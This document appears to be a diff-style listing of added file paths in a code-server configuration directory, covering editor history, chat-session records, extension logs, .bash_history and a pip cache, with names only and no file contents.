+/opt/service_finder/code-server-config/data/User/History/55969fe3/entries.json +/opt/service_finder/code-server-config/data/User/History/-4ace1ff2 +/opt/service_finder/code-server-config/data/User/History/-4ace1ff2/30t5.py +/opt/service_finder/code-server-config/data/User/History/-4ace1ff2/wfWY.py +/opt/service_finder/code-server-config/data/User/History/-4ace1ff2/MvHD.py +/opt/service_finder/code-server-config/data/User/History/-4ace1ff2/entries.json +/opt/service_finder/code-server-config/data/User/History/-22981f1a +/opt/service_finder/code-server-config/data/User/History/-22981f1a/roVG.py +/opt/service_finder/code-server-config/data/User/History/-22981f1a/6EB5.py +/opt/service_finder/code-server-config/data/User/History/-22981f1a/entries.json +/opt/service_finder/code-server-config/data/User/History/-719dbe4 +/opt/service_finder/code-server-config/data/User/History/-719dbe4/2C3o.json +/opt/service_finder/code-server-config/data/User/History/-719dbe4/entries.json +/opt/service_finder/code-server-config/data/User/History/3ae47db8 +/opt/service_finder/code-server-config/data/User/History/3ae47db8/bsiX +/opt/service_finder/code-server-config/data/User/History/3ae47db8/WFYx +/opt/service_finder/code-server-config/data/User/History/3ae47db8/eAJ3 +/opt/service_finder/code-server-config/data/User/History/3ae47db8/fjXV +/opt/service_finder/code-server-config/data/User/History/3ae47db8/entries.json +/opt/service_finder/code-server-config/data/User/History/-6713540d +/opt/service_finder/code-server-config/data/User/History/-6713540d/xRtx.txt +/opt/service_finder/code-server-config/data/User/History/-6713540d/entries.json +/opt/service_finder/code-server-config/data/User/History/-4958fed3 +/opt/service_finder/code-server-config/data/User/History/-4958fed3/RO9K.py +/opt/service_finder/code-server-config/data/User/History/-4958fed3/V3OE.py +/opt/service_finder/code-server-config/data/User/History/-4958fed3/entries.json +/opt/service_finder/code-server-config/data/User/History/71ceecfb +/opt/service_finder/code-server-config/data/User/History/71ceecfb/khcD +/opt/service_finder/code-server-config/data/User/History/71ceecfb/entries.json +/opt/service_finder/code-server-config/data/User/History/16d1374a +/opt/service_finder/code-server-config/data/User/History/16d1374a/gs9K.py +/opt/service_finder/code-server-config/data/User/History/16d1374a/entries.json +/opt/service_finder/code-server-config/data/User/History/359c80de +/opt/service_finder/code-server-config/data/User/History/359c80de/iEZY.py +/opt/service_finder/code-server-config/data/User/History/359c80de/entries.json +/opt/service_finder/code-server-config/data/User/History/-5e83fa91 +/opt/service_finder/code-server-config/data/User/History/-5e83fa91/4Cft.py +/opt/service_finder/code-server-config/data/User/History/-5e83fa91/5GlT.py +/opt/service_finder/code-server-config/data/User/History/-5e83fa91/entries.json +/opt/service_finder/code-server-config/data/User/History/-638902d7 +/opt/service_finder/code-server-config/data/User/History/-638902d7/2Pxf.py +/opt/service_finder/code-server-config/data/User/History/-638902d7/YGCT.py +/opt/service_finder/code-server-config/data/User/History/-638902d7/entries.json +/opt/service_finder/code-server-config/data/User/History/-638902d7/6Sot.py +/opt/service_finder/code-server-config/data/User/History/639c2122 +/opt/service_finder/code-server-config/data/User/History/639c2122/entries.json +/opt/service_finder/code-server-config/data/User/History/639c2122/u4bN.py +/opt/service_finder/code-server-config/data/User/History/-1e547221 +/opt/service_finder/code-server-config/data/User/History/-1e547221/thOH.py +/opt/service_finder/code-server-config/data/User/History/-1e547221/entries.json +/opt/service_finder/code-server-config/data/User/History/-6f62bdcf +/opt/service_finder/code-server-config/data/User/History/-6f62bdcf/Krug.py +/opt/service_finder/code-server-config/data/User/History/-6f62bdcf/gq3x.py +/opt/service_finder/code-server-config/data/User/History/-6f62bdcf/entries.json +/opt/service_finder/code-server-config/data/User/caches +/opt/service_finder/code-server-config/data/User/caches/CachedConfigurations +/opt/service_finder/code-server-config/data/User/caches/CachedConfigurations/folder +/opt/service_finder/code-server-config/data/User/caches/CachedConfigurations/folder/-5879b260 +/opt/service_finder/code-server-config/data/User/caches/CachedConfigurations/folder/-5879b260/configuration.json +/opt/service_finder/code-server-config/data/User/caches/CachedConfigurations/folder/-5c4fcefd +/opt/service_finder/code-server-config/data/User/caches/CachedConfigurations/folder/-5c4fcefd/configuration.json +/opt/service_finder/code-server-config/data/User/caches/CachedConfigurations/folder/3e658ed7 +/opt/service_finder/code-server-config/data/User/caches/CachedConfigurations/folder/3e658ed7/configuration.json +/opt/service_finder/code-server-config/data/User/caches/CachedConfigurations/folder/-285bda86 +/opt/service_finder/code-server-config/data/User/caches/CachedConfigurations/folder/-285bda86/configuration.json +/opt/service_finder/code-server-config/data/User/Backups +/opt/service_finder/code-server-config/data/User/Backups/-54297bf2 +/opt/service_finder/code-server-config/data/User/Backups/-54297bf2/vscode-remote +/opt/service_finder/code-server-config/data/User/settings.json +/opt/service_finder/code-server-config/data/User/snippets +/opt/service_finder/code-server-config/data/User/globalStorage +/opt/service_finder/code-server-config/data/User/globalStorage/vscode.json-language-features +/opt/service_finder/code-server-config/data/User/globalStorage/vscode.json-language-features/json-schema-cache +/opt/service_finder/code-server-config/data/User/systemExtensionsCache.json +/opt/service_finder/code-server-config/data/User/machineid +/opt/service_finder/code-server-config/data/User/workspaceStorage +/opt/service_finder/code-server-config/data/User/workspaceStorage/-63ce429 +/opt/service_finder/code-server-config/data/User/workspaceStorage/-63ce429/chatEditingSessions +/opt/service_finder/code-server-config/data/User/workspaceStorage/-63ce429/chatEditingSessions/a91fca11-9919-49b2-9aab-55a4263a881f +/opt/service_finder/code-server-config/data/User/workspaceStorage/-63ce429/chatEditingSessions/a91fca11-9919-49b2-9aab-55a4263a881f/state.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/-63ce429/chatEditingSessions/a91fca11-9919-49b2-9aab-55a4263a881f/contents +/opt/service_finder/code-server-config/data/User/workspaceStorage/-63ce429/chatSessions +/opt/service_finder/code-server-config/data/User/workspaceStorage/-63ce429/chatSessions/a91fca11-9919-49b2-9aab-55a4263a881f.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/64cc123a +/opt/service_finder/code-server-config/data/User/workspaceStorage/64cc123a/vscode.lock +/opt/service_finder/code-server-config/data/User/workspaceStorage/64cc123a/meta.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/64cc123a/chatEditingSessions +/opt/service_finder/code-server-config/data/User/workspaceStorage/64cc123a/chatEditingSessions/ff708a20-4b56-4c2d-8af1-bf0a107df673 +/opt/service_finder/code-server-config/data/User/workspaceStorage/64cc123a/chatEditingSessions/ff708a20-4b56-4c2d-8af1-bf0a107df673/state.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/64cc123a/chatEditingSessions/ff708a20-4b56-4c2d-8af1-bf0a107df673/contents +/opt/service_finder/code-server-config/data/User/workspaceStorage/64cc123a/chatSessions +/opt/service_finder/code-server-config/data/User/workspaceStorage/64cc123a/chatSessions/ff708a20-4b56-4c2d-8af1-bf0a107df673.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2 +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/vscode.lock +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/db5da8e2-e0b3-43bd-a73f-59c06d1367d1 +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/db5da8e2-e0b3-43bd-a73f-59c06d1367d1/state.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/db5da8e2-e0b3-43bd-a73f-59c06d1367d1/contents +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/d21d60af-afdf-4015-ac22-8468113828ba +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/d21d60af-afdf-4015-ac22-8468113828ba/state.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/d21d60af-afdf-4015-ac22-8468113828ba/contents +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/98c877cb-9c52-4901-988e-890d63101faf +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/98c877cb-9c52-4901-988e-890d63101faf/state.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/98c877cb-9c52-4901-988e-890d63101faf/contents +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/508a716e-f283-436b-b9c7-f68336e877d2 +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/508a716e-f283-436b-b9c7-f68336e877d2/state.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/508a716e-f283-436b-b9c7-f68336e877d2/contents +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/2fe3f8f1-90c9-4db0-8659-7ddaaa21ab7c +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/2fe3f8f1-90c9-4db0-8659-7ddaaa21ab7c/state.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/2fe3f8f1-90c9-4db0-8659-7ddaaa21ab7c/contents +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/df31879f-7816-4000-922a-1ae16dfa748e +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/df31879f-7816-4000-922a-1ae16dfa748e/state.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/df31879f-7816-4000-922a-1ae16dfa748e/contents +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/daa34a05-12c3-4f1d-b7c1-6dbcf59e3426 +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/daa34a05-12c3-4f1d-b7c1-6dbcf59e3426/state.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/daa34a05-12c3-4f1d-b7c1-6dbcf59e3426/contents +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/daa34a05-12c3-4f1d-b7c1-6dbcf59e3426.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/df31879f-7816-4000-922a-1ae16dfa748e.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/d21d60af-afdf-4015-ac22-8468113828ba.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions/508a716e-f283-436b-b9c7-f68336e877d2.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/787b6db1 +/opt/service_finder/code-server-config/data/User/workspaceStorage/787b6db1/meta.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/787b6db1/chatEditingSessions +/opt/service_finder/code-server-config/data/User/workspaceStorage/787b6db1/chatEditingSessions/d5306add-574b-4ca9-80a2-e738a2954019 +/opt/service_finder/code-server-config/data/User/workspaceStorage/787b6db1/chatEditingSessions/d5306add-574b-4ca9-80a2-e738a2954019/state.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/787b6db1/chatEditingSessions/d5306add-574b-4ca9-80a2-e738a2954019/contents +/opt/service_finder/code-server-config/data/User/workspaceStorage/787b6db1/chatSessions +/opt/service_finder/code-server-config/data/User/workspaceStorage/787b6db1/chatSessions/d5306add-574b-4ca9-80a2-e738a2954019.json +/opt/service_finder/code-server-config/data/User/workspaceStorage/787b6db1-1 +/opt/service_finder/code-server-config/data/CachedProfilesData +/opt/service_finder/code-server-config/data/CachedProfilesData/__default__profile__ +/opt/service_finder/code-server-config/data/CachedProfilesData/__default__profile__/extensions.user.cache +/opt/service_finder/code-server-config/data/CachedProfilesData/__default__profile__/extensions.builtin.cache +/opt/service_finder/code-server-config/data/logs +/opt/service_finder/code-server-config/data/logs/20260120T003918 +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost1 +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost1/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost1/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost1/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost1/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost1/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost1/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost1/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost1/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost2 +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost2/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost2/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost2/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost2/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost2/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost2/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost2/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T003918/exthost2/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T003918/remoteagent.log +/opt/service_finder/code-server-config/data/logs/20260120T172343 +/opt/service_finder/code-server-config/data/logs/20260120T172343/exthost1 +/opt/service_finder/code-server-config/data/logs/20260120T172343/exthost1/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T172343/exthost1/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T172343/exthost1/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T172343/exthost1/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T172343/exthost1/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T172343/exthost1/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T172343/exthost1/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T172343/exthost1/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T172343/ptyhost.log +/opt/service_finder/code-server-config/data/logs/20260120T172343/remoteagent.log +/opt/service_finder/code-server-config/data/logs/20260120T004510 +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost3 +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost3/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost3/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost3/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost3/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost3/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost3/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost3/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost3/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost1 +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost1/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost1/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost1/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost1/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost1/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost1/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost1/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost1/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost4 +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost4/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost4/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost4/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost4/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost4/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost4/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost4/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost4/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost2 +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost2/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost2/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost2/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost2/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost2/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost2/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost2/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/exthost2/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/ptyhost.log +/opt/service_finder/code-server-config/data/logs/20260120T004510/remoteagent.log +/opt/service_finder/code-server-config/data/logs/20260120T175427 +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost5 +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost5/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost5/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost5/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost5/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost5/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost5/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost5/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost5/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost3 +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost3/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost3/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost3/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost3/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost3/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost3/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost3/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost3/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost7 +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost7/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost7/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost7/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost7/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost7/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost7/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost7/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost7/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost6 +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost6/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost6/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost6/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost6/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost6/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost6/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost6/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost6/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost1 +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost1/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost1/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost1/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost1/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost1/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost1/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost1/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost1/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4 +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4/vscode.json-language-features +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4/vscode.json-language-features/JSON Language Server.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4/vscode.html-language-features +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4/vscode.html-language-features/HTML Language Server.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost4/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost2 +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost2/vscode.git +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost2/vscode.git/Git.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost2/vscode.github +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost2/vscode.github/GitHub.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost2/vscode.html-language-features +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost2/vscode.html-language-features/HTML Language Server.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost2/remoteExtHostTelemetry.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost2/vscode.github-authentication +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost2/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/exthost2/remoteexthost.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/ptyhost.log +/opt/service_finder/code-server-config/data/logs/20260120T175427/remoteagent.log +/opt/service_finder/code-server-config/data/coder.json +/opt/service_finder/code-server-config/.bash_history +/opt/service_finder/code-server-config/.cache +/opt/service_finder/code-server-config/.cache/pip +/opt/service_finder/code-server-config/.cache/pip/http-v2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/3 +/opt/service_finder/code-server-config/.cache/pip/http-v2/3/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/3/0/e +/opt/service_finder/code-server-config/.cache/pip/http-v2/3/0/e/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/3/0/e/f/1 +/opt/service_finder/code-server-config/.cache/pip/http-v2/3/0/e/f/1/30ef132248ab98ab0a92d2d15ee6957bdad5542ffbb630d3a32f7721.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/3/0/e/f/1/30ef132248ab98ab0a92d2d15ee6957bdad5542ffbb630d3a32f7721 +/opt/service_finder/code-server-config/.cache/pip/http-v2/3/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/3/d/b +/opt/service_finder/code-server-config/.cache/pip/http-v2/3/d/b/a +/opt/service_finder/code-server-config/.cache/pip/http-v2/3/d/b/a/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/3/d/b/a/4/3dba48e33e4deae5b8e0b5d8173f7d8b9ede86f6e2f3b423cb213061 +/opt/service_finder/code-server-config/.cache/pip/http-v2/3/d/b/a/4/3dba48e33e4deae5b8e0b5d8173f7d8b9ede86f6e2f3b423cb213061.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/a +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/e +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/e/5 +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/e/5/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/e/5/f/a +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/e/5/f/a/ae5faffb20c18d03a8d32e103e2a7344328d8d276566417eca03d0d7.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/e/5/f/a/ae5faffb20c18d03a8d32e103e2a7344328d8d276566417eca03d0d7 +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/0/3 +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/0/3/e +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/0/3/e/7 +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/0/3/e/7/a03e77d6fd1aff6b4ee6b34a140bd46cfb7fa1873254b62a2d30e9d7.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/0/3/e/7/a03e77d6fd1aff6b4ee6b34a140bd46cfb7fa1873254b62a2d30e9d7 +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/b +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/b/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/b/0/c +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/b/0/c/9 +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/b/0/c/9/ab0c951c13ffa0438821f87295bc6ff5ca5c6104a972107beff7ec14 +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/b/0/c/9/ab0c951c13ffa0438821f87295bc6ff5ca5c6104a972107beff7ec14.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/b/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/b/d/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/b/d/d/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/b/d/d/d/abdddc46265b81c7d6dc73a20f1ad8ef043a66e9e79abdc1379bf71e.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/a/b/d/d/d/abdddc46265b81c7d6dc73a20f1ad8ef043a66e9e79abdc1379bf71e +/opt/service_finder/code-server-config/.cache/pip/http-v2/2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/2/c +/opt/service_finder/code-server-config/.cache/pip/http-v2/2/c/5 +/opt/service_finder/code-server-config/.cache/pip/http-v2/2/c/5/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/2/c/5/0/9 +/opt/service_finder/code-server-config/.cache/pip/http-v2/2/c/5/0/9/2c5093416a6abc33fb0ff1433322d374c320a79a2ce63946a0a9ddf3.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/2/c/5/0/9/2c5093416a6abc33fb0ff1433322d374c320a79a2ce63946a0a9ddf3 +/opt/service_finder/code-server-config/.cache/pip/http-v2/2/8 +/opt/service_finder/code-server-config/.cache/pip/http-v2/2/8/8 +/opt/service_finder/code-server-config/.cache/pip/http-v2/2/8/8/5 +/opt/service_finder/code-server-config/.cache/pip/http-v2/2/8/8/5/1 +/opt/service_finder/code-server-config/.cache/pip/http-v2/2/8/8/5/1/28851bfda9e7b366cbac79b783dc038d1fee039b3e50c3151b437013.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/2/8/8/5/1/28851bfda9e7b366cbac79b783dc038d1fee039b3e50c3151b437013 +/opt/service_finder/code-server-config/.cache/pip/http-v2/7 +/opt/service_finder/code-server-config/.cache/pip/http-v2/7/5 +/opt/service_finder/code-server-config/.cache/pip/http-v2/7/5/2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/7/5/2/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/7/5/2/4/8 +/opt/service_finder/code-server-config/.cache/pip/http-v2/7/5/2/4/8/75248c373d50f62ae989db97e5f74613b5b513b024376712f93d486a +/opt/service_finder/code-server-config/.cache/pip/http-v2/7/5/2/4/8/75248c373d50f62ae989db97e5f74613b5b513b024376712f93d486a.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/7/b +/opt/service_finder/code-server-config/.cache/pip/http-v2/7/b/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/7/b/f/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/7/b/f/d/a +/opt/service_finder/code-server-config/.cache/pip/http-v2/7/b/f/d/a/7bfda9f6c7fc68d2025bf39812313b43025996be0f6256ea8fc36f0c.body 